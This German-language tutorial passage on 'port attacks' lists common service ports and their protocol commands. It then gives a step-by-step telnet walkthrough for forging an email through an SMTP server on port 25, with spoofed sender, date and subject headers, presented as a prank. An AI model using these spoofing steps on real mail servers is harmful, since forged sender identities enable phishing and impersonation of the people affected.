Mit Port-Angriffen werden die jeweiligen Dienste bzw. Protokolle direkt angesprochen und deren Schwachstellen (z.B. Programmierfehler) ausgenutzt. Es soll an dieser Stelle kein Kurs in Systemeinbrüche gegeben werden, sondern lediglich gezeigt werden, wie ein solcher Angriff aussehen könnte. Folgende gängigen Ports können angesprochen werden:
Telnet: Port 23
FTP (ftp): Port 21, (Befehle: "USER" und "PASS")
E-Mail (smtp): Port 25, (Befehle: "MAIL FROM", "RCPT TO", "DATA", "HELO", "EHLO", "RSET", "NOOP", "QUIT", "HELP", "VRFY", "EXPN" und "VERB")
Usenet News (nntp): Port 119 (Befehle: "POST")
World Wide Web (http): Port 80, (Befehle "GET / HTTP/1.0")
Beispiel: Fälschung von E-Mails
1. Einloggen auf den Port 25 eines Servers:
telnet://domaene.name:25
2. Nun geben Sie dem Rechner die Domäne (erscheint im Header der E-Mail) von der Sie gerne eine E-Mail versenden möchten an (lassen Sie Ihrer Phantasie freien Lauf!). Wenn Sie die Domäne des angewählten Rechners beibehalten möchten genügt ein <ENTER>.
HELO archiv.ch
3. Als Nächstes geben Sie an, von wem die E-Mail geschickt werden soll:
MAIL FROM: samichlaus@archiv.ch
4. Wie bei jeder normalen E-Mail müssen Sie auch hier den Empfänger eingeben:
RCPT TO: naiver@oldman.com
5. Nachdem Sie den folgenden Befehl eingegeben haben, können Sie mit dem Tippen des Inhalts ihrer Mail beginnen:
DATA
6. Fügen Sie ihrer Mail noch eine Subject-Zeile an:
SUBJECT: 1. April-Scherz
6. Wenn Sie das Datum der E-Mail ebenfalls fälschen wollen, genügt die folgende Zeile (wobei das E-Mail-Datum des Servers ebenfalls ersichtlich ist):
DATE: Wed, 10 Jun 2000 19:05:10
7. Geben Sie an von wem die E-Mail stammen soll:
FROM: samichlaus@archiv.ch
8. Geben Sie an wem die E-Mail zugesandt werden soll:
TO: samichlaus@archiv.ch
9. Tippen Sie nun Ihre Nachricht ein und schicken Sie die Mail ab, indem Sie eine neue Zeile beginnen und dort einen Punkt eingeben:
Dies ist eine Beispielsnachricht. Just for fun!
.